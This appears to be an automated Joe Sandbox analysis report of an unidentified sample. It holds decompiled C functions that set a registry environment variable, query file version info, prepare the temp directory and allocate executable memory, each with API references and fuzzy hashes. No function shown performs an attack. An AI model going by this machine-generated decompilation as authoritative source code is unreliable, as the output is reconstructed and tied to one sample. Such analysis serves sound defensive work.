                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00C9792F(char* __ecx, void* __edx, intOrPtr* _a4) {
				signed int _v8;
				void* _v32;
				long _v36;
				void* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				intOrPtr* _t22;
				int _t23;
				signed int _t26;
				signed int _t29;
				signed int _t32;
				int _t38;
				signed int _t45;
				void* _t47;
				char* _t48;
				void* _t51;
				void* _t52;
				signed int _t53;

				_t47 = __edx;
				_t20 =  *0xd64070; // 0x8a9e1774
				_v8 = _t20 ^ _t53;
				_t22 = _a4;
				_t38 = 0;
				_v36 = _t22;
				_t48 = __ecx;
				if(_t22 == 0 || __ecx == 0 ||  *_t22 == 0 ||  *((intOrPtr*)(__ecx)) == 0) {
					_t23 = 0;
				} else {
					_push(_t51);
					_t52 = L"Environment";
					_v44 = 0;
					_t26 = RegOpenKeyExW(0x80000001, _t52, 0, 0xf003f,  &_v44);
					asm("sbb eax, eax");
					_t29 =  !( ~_t26) & _v44;
					_v40 = _t29;
					if(_t29 != 0) {
						_t32 = RegSetValueExW(_v40, _v36, 0, 2, _t48, E00D00EBB(_t48) + _t30 + 2);
						asm("sbb ebx, ebx");
						_t38 =  ~_t32 + 1;
						if(_t38 != 0) {
							_v36 = _v36 & 0x00000000;
							_t45 = 6;
							memcpy( &_v32, _t52, _t45 << 2);
							_t48 = _t52 + _t45 + _t45;
							SendMessageTimeoutW(0xffff, 0x1a, 0,  &_v32, 1, 0xbb8,  &_v36);
						}
						RegCloseKey(_v40);
					}
					_t23 = _t38;
					_pop(_t51);
				}
				return E00D0071A(_t23, _t38, _v8 ^ _t53, _t47, _t48, _t51);
			}
























                                                                                                                                                                                          0x00c9792f
                                                                                                                                                                                          0x00c97935
                                                                                                                                                                                          0x00c9793c
                                                                                                                                                                                          0x00c9793f
                                                                                                                                                                                          0x00c97943
                                                                                                                                                                                          0x00c97946
                                                                                                                                                                                          0x00c97949
                                                                                                                                                                                          0x00c9794d
                                                                                                                                                                                          0x00c979f7
                                                                                                                                                                                          0x00c9796d
                                                                                                                                                                                          0x00c9796d
                                                                                                                                                                                          0x00c97978
                                                                                                                                                                                          0x00c97983
                                                                                                                                                                                          0x00c97986
                                                                                                                                                                                          0x00c9798e
                                                                                                                                                                                          0x00c97992
                                                                                                                                                                                          0x00c97995
                                                                                                                                                                                          0x00c97998
                                                                                                                                                                                          0x00c979b0
                                                                                                                                                                                          0x00c979ba
                                                                                                                                                                                          0x00c979bc
                                                                                                                                                                                          0x00c979bd
                                                                                                                                                                                          0x00c979bf
                                                                                                                                                                                          0x00c979c5
                                                                                                                                                                                          0x00c979e1
                                                                                                                                                                                          0x00c979e1
                                                                                                                                                                                          0x00c979e3
                                                                                                                                                                                          0x00c979e3
                                                                                                                                                                                          0x00c979ec
                                                                                                                                                                                          0x00c979ec
                                                                                                                                                                                          0x00c979f2
                                                                                                                                                                                          0x00c979f4
                                                                                                                                                                                          0x00c979f4
                                                                                                                                                                                          0x00c97a06

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Environment,00000000,000F003F,?), ref: 00C97986
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00C9799B
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000002,?,?), ref: 00C979B0
                                                                                                                                                                                          • SendMessageTimeoutW.USER32 ref: 00C979E3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00C979EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseMessageOpenSendTimeoutValue_wcslen
                                                                                                                                                                                          • String ID: Environment
                                                                                                                                                                                          • API String ID: 438598746-3233436149
                                                                                                                                                                                          • Opcode ID: 966a88aa691f75c6ac2d6f88e7e0600f6c9169ec7c3375b2c0720b7e0a4500b3
                                                                                                                                                                                          • Instruction ID: eefa65e6dee9d442511752b205f6b30793e90324a74e9385e9e1a1bd1c6be200
                                                                                                                                                                                          • Opcode Fuzzy Hash: 966a88aa691f75c6ac2d6f88e7e0600f6c9169ec7c3375b2c0720b7e0a4500b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC214F72A51209ABDF109FA8DC89FEEB7B8EB48710F554229E601F6180DBB59D448B21
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE7ED6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00CE7ED6(void* __ebx, void* __edx, short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v8200;
				void* _v8204;
				int _v8208;
				int _v8212;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t25;
				int _t30;
				void* _t37;
				void* _t41;
				void* _t48;
				intOrPtr _t49;
				short* _t50;
				signed int _t51;

				_t48 = __edx;
				_t41 = __ebx;
				E00D00E90(0x2010);
				_t23 =  *0xd64070; // 0x8a9e1774
				_v8 = _t23 ^ _t51;
				_t50 = _a4;
				_t49 = _a8;
				if(_t50 == 0 || _t49 == 0 || _a12 < 0x80) {
					L8:
					_t25 = 0;
				} else {
					_v8208 = _v8208 & 0x00000000;
					E00D006A0(_t49,  &_v8200, 0, 0x2000);
					_t30 = GetFileVersionInfoSizeW(_t50,  &_v8208);
					if(_t30 == 0 || _t30 > 0x1fff || GetFileVersionInfoW(_t50, 0, _t30,  &_v8200) == 0 || VerQueryValueW( &_v8200, 0xd48b4c,  &_v8204,  &_v8212) == 0) {
						goto L8;
					} else {
						E00D006A0(_t49, _t49, 0, _a12);
						_t37 = _v8204;
						_push( *(_t37 + 0xc) & 0x0000ffff);
						_push( *(_t37 + 0xe) & 0x0000ffff);
						_push( *(_t37 + 8) & 0x0000ffff);
						E00CC6919(_t49, _a12, L"%d.%d.%d.%d",  *(_t37 + 0xa) & 0x0000ffff);
						_t25 = 1;
					}
				}
				return E00D0071A(_t25, _t41, _v8 ^ _t51, _t48, _t49, _t50);
			}



















                                                                                                                                                                                          0x00ce7ed6
                                                                                                                                                                                          0x00ce7ed6
                                                                                                                                                                                          0x00ce7ede
                                                                                                                                                                                          0x00ce7ee3
                                                                                                                                                                                          0x00ce7eea
                                                                                                                                                                                          0x00ce7eee
                                                                                                                                                                                          0x00ce7ef2
                                                                                                                                                                                          0x00ce7ef7
                                                                                                                                                                                          0x00ce7fb9
                                                                                                                                                                                          0x00ce7fb9
                                                                                                                                                                                          0x00ce7f12
                                                                                                                                                                                          0x00ce7f12
                                                                                                                                                                                          0x00ce7f27
                                                                                                                                                                                          0x00ce7f37
                                                                                                                                                                                          0x00ce7f3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce7f7e
                                                                                                                                                                                          0x00ce7f84
                                                                                                                                                                                          0x00ce7f89
                                                                                                                                                                                          0x00ce7f93
                                                                                                                                                                                          0x00ce7f98
                                                                                                                                                                                          0x00ce7fa1
                                                                                                                                                                                          0x00ce7fac
                                                                                                                                                                                          0x00ce7fb6
                                                                                                                                                                                          0x00ce7fb6
                                                                                                                                                                                          0x00ce7f3e
                                                                                                                                                                                          0x00ce7fc8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE7F27
                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?,?,?,00000080,?,?,?,?,?,00000004), ref: 00CE7F37
                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,?,?,?,?,?,00000080,?,?,?,?,?,00000004), ref: 00CE7F52
                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00D48B4C,?,?,?,00000000,00000000,?,?,?,?,?,00000080), ref: 00CE7F75
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE7F84
                                                                                                                                                                                            • Part of subcall function 00CC6919: _vswprintf_s.LIBCMT ref: 00CC694C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInfoVersion_memset$QuerySizeValue_vswprintf_s
                                                                                                                                                                                          • String ID: %d.%d.%d.%d
                                                                                                                                                                                          • API String ID: 3774703460-3491811756
                                                                                                                                                                                          • Opcode ID: 6f0eb095de769d4b23ca2c487375110be2414c448c5545446733bc20b12ab41e
                                                                                                                                                                                          • Instruction ID: 8ddc0024b539aa6adfb70d03fd6a4929b83cf51e3ad1ffd7055d57b09b8d844b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0eb095de769d4b23ca2c487375110be2414c448c5545446733bc20b12ab41e
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED217F72500219ABEB24DFA5CC45FBAB3A9EF04700F144699BA09E2082D7B4EE45DB75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEC5B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00CEC5B1(void* __ebx, void* __edx, short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v264;
				void* _v268;
				int _v272;
				int _v276;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t23;
				int _t28;
				void* _t35;
				void* _t39;
				void* _t46;
				intOrPtr _t47;
				short* _t48;
				signed int _t49;

				_t46 = __edx;
				_t39 = __ebx;
				_t21 =  *0xd64070; // 0x8a9e1774
				_v8 = _t21 ^ _t49;
				_t48 = _a4;
				_t47 = _a8;
				if(_t48 == 0 || _t47 == 0 || _a12 < 0x80) {
					L8:
					_t23 = 0;
				} else {
					_v272 = _v272 & 0x00000000;
					E00D006A0(_t47,  &_v264, 0, 0x100);
					_t28 = GetFileVersionInfoSizeW(_t48,  &_v272);
					if(_t28 == 0 || _t28 > 0xff || GetFileVersionInfoW(_t48, 0, _t28,  &_v264) == 0 || VerQueryValueW( &_v264, 0xd48b4c,  &_v268,  &_v276) == 0) {
						goto L8;
					} else {
						E00D006A0(_t47, _t47, 0, _a12);
						_t35 = _v268;
						_push( *(_t35 + 0xc) & 0x0000ffff);
						_push( *(_t35 + 0xe) & 0x0000ffff);
						_push( *(_t35 + 8) & 0x0000ffff);
						E00CC6919(_t47, _a12, L"%d.%d.%d.%d",  *(_t35 + 0xa) & 0x0000ffff);
						_t23 = 1;
					}
				}
				return E00D0071A(_t23, _t39, _v8 ^ _t49, _t46, _t47, _t48);
			}



















                                                                                                                                                                                          0x00cec5b1
                                                                                                                                                                                          0x00cec5b1
                                                                                                                                                                                          0x00cec5ba
                                                                                                                                                                                          0x00cec5c1
                                                                                                                                                                                          0x00cec5c5
                                                                                                                                                                                          0x00cec5c9
                                                                                                                                                                                          0x00cec5ce
                                                                                                                                                                                          0x00cec690
                                                                                                                                                                                          0x00cec690
                                                                                                                                                                                          0x00cec5e9
                                                                                                                                                                                          0x00cec5e9
                                                                                                                                                                                          0x00cec5fe
                                                                                                                                                                                          0x00cec60e
                                                                                                                                                                                          0x00cec615
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cec655
                                                                                                                                                                                          0x00cec65b
                                                                                                                                                                                          0x00cec660
                                                                                                                                                                                          0x00cec66a
                                                                                                                                                                                          0x00cec66f
                                                                                                                                                                                          0x00cec678
                                                                                                                                                                                          0x00cec683
                                                                                                                                                                                          0x00cec68d
                                                                                                                                                                                          0x00cec68d
                                                                                                                                                                                          0x00cec615
                                                                                                                                                                                          0x00cec69f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEC5FE
                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,00000000,?,00000000), ref: 00CEC60E
                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CEC629
                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00D48B4C,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CEC64C
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEC65B
                                                                                                                                                                                            • Part of subcall function 00CC6919: _vswprintf_s.LIBCMT ref: 00CC694C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInfoVersion_memset$QuerySizeValue_vswprintf_s
                                                                                                                                                                                          • String ID: %d.%d.%d.%d
                                                                                                                                                                                          • API String ID: 3774703460-3491811756
                                                                                                                                                                                          • Opcode ID: d021532886433490910053d17c9c8983e001e0845d59620c47e06fdf176a6c8d
                                                                                                                                                                                          • Instruction ID: fc6c6fe0088d8fe3d1dd29e8f5454ebbb47827eaa1b3a5f67a962ad91f1d75df
                                                                                                                                                                                          • Opcode Fuzzy Hash: d021532886433490910053d17c9c8983e001e0845d59620c47e06fdf176a6c8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21C272900218ABDB21DF61CC82FFFB3ACEF08700F045099BA55D6080E7B4EA819B70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9AD9C Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00C9AD9C(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t27;
				int _t31;
				int _t33;
				void* _t40;
				void* _t43;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t53;
				signed int _t55;
				void* _t57;

				_t47 = __edx;
				_t55 = _t57 - 0x78c;
				_t19 =  *0xd64070; // 0x8a9e1774
				 *(_t55 + 0x788) = _t19 ^ _t55;
				_push(_t48);
				 *((intOrPtr*)(_t55 - 0x80)) =  *((intOrPtr*)(_t55 + 0x794));
				E00D006A0(_t48, _t55 - 0x78, 0, 0x800);
				GetTempPathW(0x400, _t55 - 0x78);
				_t27 = PathFileExistsW(_t55 - 0x78);
				 *(_t55 - 0x7c) = _t27;
				_t63 = _t27 - 1;
				if(_t27 == 1) {
					L5:
					if( *(_t55 - 0x7c) != 0) {
						E00C9ACCC( *((intOrPtr*)(_t55 - 0x80)), _t55 - 0x78);
						_t31 = 1;
						__eflags = 1;
						L8:
						_pop(_t50);
						_pop(_t53);
						_pop(_t43);
						return E00D0071A(_t31, _t43,  *(_t55 + 0x788) ^ _t55, _t47, _t50, _t53);
					}
					L6:
					_t31 = 0;
					goto L8;
				}
				_t33 = E00C97B0B(_t47, _t63);
				 *(_t55 - 0x7c) = _t33;
				if(_t33 == 0) {
					goto L6;
				} else {
					E00D006A0(PathFileExistsW, _t55 - 0x78, 0, 0x800);
					GetTempPathW(0x400, _t55 - 0x78);
					if(PathFileExistsW(_t55 - 0x78) == 0) {
						_t40 = _t55 - 0x78;
						__imp__SHCreateDirectoryExW(0, _t40, 0);
						if(_t40 != 0) {
							 *(_t55 - 0x7c) = 0;
						}
					}
					goto L5;
				}
			}


















                                                                                                                                                                                          0x00c9ad9c
                                                                                                                                                                                          0x00c9ad9d
                                                                                                                                                                                          0x00c9adaa
                                                                                                                                                                                          0x00c9adb1
                                                                                                                                                                                          0x00c9adbf
                                                                                                                                                                                          0x00c9adc5
                                                                                                                                                                                          0x00c9adce
                                                                                                                                                                                          0x00c9ade6
                                                                                                                                                                                          0x00c9adf2
                                                                                                                                                                                          0x00c9adf4
                                                                                                                                                                                          0x00c9adf7
                                                                                                                                                                                          0x00c9adfa
                                                                                                                                                                                          0x00c9ae41
                                                                                                                                                                                          0x00c9ae45
                                                                                                                                                                                          0x00c9ae52
                                                                                                                                                                                          0x00c9ae59
                                                                                                                                                                                          0x00c9ae59
                                                                                                                                                                                          0x00c9ae5a
                                                                                                                                                                                          0x00c9ae60
                                                                                                                                                                                          0x00c9ae61
                                                                                                                                                                                          0x00c9ae64
                                                                                                                                                                                          0x00c9ae71
                                                                                                                                                                                          0x00c9ae71
                                                                                                                                                                                          0x00c9ae47
                                                                                                                                                                                          0x00c9ae47
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ae47
                                                                                                                                                                                          0x00c9adfc
                                                                                                                                                                                          0x00c9ae01
                                                                                                                                                                                          0x00c9ae06
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ae08
                                                                                                                                                                                          0x00c9ae13
                                                                                                                                                                                          0x00c9ae20
                                                                                                                                                                                          0x00c9ae2a
                                                                                                                                                                                          0x00c9ae2f
                                                                                                                                                                                          0x00c9ae34
                                                                                                                                                                                          0x00c9ae3c
                                                                                                                                                                                          0x00c9ae3e
                                                                                                                                                                                          0x00c9ae3e
                                                                                                                                                                                          0x00c9ae3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ae2a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9ADCE
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,?), ref: 00C9ADE6
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C9ADF2
                                                                                                                                                                                            • Part of subcall function 00C97B0B: _memset.LIBCMT ref: 00C97B3B
                                                                                                                                                                                            • Part of subcall function 00C97B0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000028,00000000), ref: 00C97B6C
                                                                                                                                                                                            • Part of subcall function 00C97B0B: _wcscat.LIBCMT ref: 00C97B83
                                                                                                                                                                                            • Part of subcall function 00C97B0B: SetEnvironmentVariableW.KERNEL32(TMP,?), ref: 00C97BEB
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9AE13
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,?), ref: 00C9AE20
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00C9AE26
                                                                                                                                                                                          • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00C9AE34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$_memset$ExistsFileTemp$CreateDirectoryEnvironmentFolderSpecialVariable_wcscat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4253169847-0
                                                                                                                                                                                          • Opcode ID: e0da0b32bf4bb71a909eafb56def9d6daeedd50088b979f300c17bdfca3f822f
                                                                                                                                                                                          • Instruction ID: 28fa95f20701c7f6a01a3251a39c89fcefdecefc788dd17ece148d1c85e2d48a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e0da0b32bf4bb71a909eafb56def9d6daeedd50088b979f300c17bdfca3f822f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C214171D0420C9AEF30EFB5DC49BDE7BBCEB44304F104429E525D7141EA75A5448FA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFBE4E Relevance: 10.6, APIs: 7, Instructions: 59memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00CFBE4E() {
				intOrPtr _t1;
				void* _t2;
				void* _t12;
				void* _t16;
				void* _t18;
				void* _t19;

				if( *0xd6762c != 0 || E00CFBCD0() != 0) {
					_t1 =  *0xd6762c; // 0x2b77da8
					if(_t1 != 1) {
						_t2 =  *0xd67634(_t1);
						if(_t2 != 0) {
							return _t2;
						} else {
							_t18 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t18 != 0) {
								_push( *0xd6762c);
								if( *0xd67634() == 0) {
									_t16 = _t18;
									_t19 = _t18 + 0xff0;
									do {
										 *0xd67630( *0xd6762c, _t16);
										_t16 = _t16 + 0x10;
									} while (_t16 < _t19);
									L13:
									return _t16;
								}
								VirtualFree(_t18, 0, 0x8000);
								goto L13;
							}
							goto L8;
						}
					} else {
						_t12 = HeapAlloc(GetProcessHeap(), 0, 0xd);
						if(_t12 == 0) {
							goto L8;
						} else {
							return _t12;
						}
					}
				} else {
					L8:
					return 0;
				}
			}









                                                                                                                                                                                          0x00cfbdb1
                                                                                                                                                                                          0x00cfbdbc
                                                                                                                                                                                          0x00cfbdc4
                                                                                                                                                                                          0x00cfbdde
                                                                                                                                                                                          0x00cfbde6
                                                                                                                                                                                          0x00cfbe48
                                                                                                                                                                                          0x00cfbde8
                                                                                                                                                                                          0x00cfbdf9
                                                                                                                                                                                          0x00cfbdfd
                                                                                                                                                                                          0x00cfbe06
                                                                                                                                                                                          0x00cfbe16
                                                                                                                                                                                          0x00cfbe28
                                                                                                                                                                                          0x00cfbe2a
                                                                                                                                                                                          0x00cfbe30
                                                                                                                                                                                          0x00cfbe37
                                                                                                                                                                                          0x00cfbe3d
                                                                                                                                                                                          0x00cfbe40
                                                                                                                                                                                          0x00cfbe44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbe46
                                                                                                                                                                                          0x00cfbe20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbe20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbdfd
                                                                                                                                                                                          0x00cfbdc6
                                                                                                                                                                                          0x00cfbdd1
                                                                                                                                                                                          0x00cfbdd9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfbddc
                                                                                                                                                                                          0x00cfbddc
                                                                                                                                                                                          0x00cfbddc
                                                                                                                                                                                          0x00cfbdd9
                                                                                                                                                                                          0x00cfbdff
                                                                                                                                                                                          0x00cfbdff
                                                                                                                                                                                          0x00cfbe02
                                                                                                                                                                                          0x00cfbe02

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0000000D), ref: 00CFBDCA
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CFBDD1
                                                                                                                                                                                            • Part of subcall function 00CFBCD0: IsProcessorFeaturePresent.KERNEL32(0000000C,00CFBDB8), ref: 00CFBCD2
                                                                                                                                                                                          • RtlInterlockedPopEntrySList.NTDLL(02B77DA8), ref: 00CFBDDE
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00CFBDF3
                                                                                                                                                                                          • RtlInterlockedPopEntrySList.NTDLL ref: 00CFBE0C
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00CFBE20
                                                                                                                                                                                          • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00CFBE37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
